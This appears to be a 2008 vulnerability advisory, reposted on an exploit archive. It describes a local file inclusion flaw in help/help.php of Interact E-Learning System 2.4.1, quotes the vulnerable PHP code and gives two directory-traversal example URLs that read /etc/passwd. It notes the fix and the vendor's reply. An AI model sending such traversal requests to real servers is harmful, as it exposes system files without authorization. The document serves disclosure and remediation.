DSEGRG-08-31.txt

DSEGRG-08-31.txt: Posted Jul 21, 2008; Authored by Digital Security Research Group | Site dsecrg.com; Interact E-Learning System version 2.4.1 suffers from a local file inclusion vulnerability in help/help.php.; tags | exploit, local, php, file inclusion; SHA-256 | 7003f34ab97d514a0fe8f635ebc4a2cc7142e9d616351bb1d5eceb47f8d7378f; Download | Favorite | View

DSEGRG-08-31.txt


Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-31


Application:                    Interact E-Learning System      
Versions Affected:              2.4.1
Vendor URL:                     http://sourceforge.net/projects/cce-interact
Bug:                            Local File Include
Exploits:                       YES
Reported:                       03.07.2008
Vendor response:                04.07.2008
Solution:                       YES
Date of Public Advisory:        21.07.2008
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Interact E-Learning System system has local file include vulnerability in script help/help.php

Vulnerable GET parameters "module", "file".

Code
****
#################################################

$module = isset($_GET['module']) ? $_GET['module']:'';
$file   = isset($_GET['file']) ? $_GET['file']:'';

...

$hpath=$CONFIG['BASE_PATH'].'/language/'.$_SESSION['language'].'/help/'.$module.'/'.$file;
if (is_file($hpath)){
        require_once($hpath);
} else {
        require_once($CONFIG['BASE_PATH'].'/language/default/help/'.$module.'/'.$file);
}

#################################################

Example:

http://[server]/[installdir]/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/help/help.php?file=../../../../../../../../../../../../../etc/passwd



Solution
********

This file is no longer required by the system. Remove it from installation.

Vendor response:
 
"I have posted an alert to users to remove this from their installations asap and will get it removed from the next release of the package."



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsec [dot] ru
            http://www.dsec.ru (in Russian)

Top Authors In Last 30 Days

Red Hat 133 files
Ubuntu 88 files
indoushka 33 files
Debian 26 files
Apple 22 files
Gentoo 18 files
nu11secur1ty 15 files
LiquidWorm 9 files
Google Security Research 7 files
jheysel-r7 4 files

File Archives

Systems

AIX (428)
Apple (2,025)
BSD (375)
CentOS (57)
Cisco (1,925)
Debian (6,851)
Fedora (1,692)
FreeBSD (1,246)
Gentoo (4,340)
HPUX (879)
iOS (357)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (46,858)
Mac OS X (687)
Mandriva (3,105)
NetBSD (256)
OpenBSD (485)
RedHat (13,927)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,953)
UNIX (9,319)
UnixWare (186)
Windows (6,590)
Other

DSEGRG-08-31.txt

DSEGRG-08-31.txt

File Archive:

October 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DSEGRG-08-31.txt

Share This

DSEGRG-08-31.txt

File Archive:

October 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems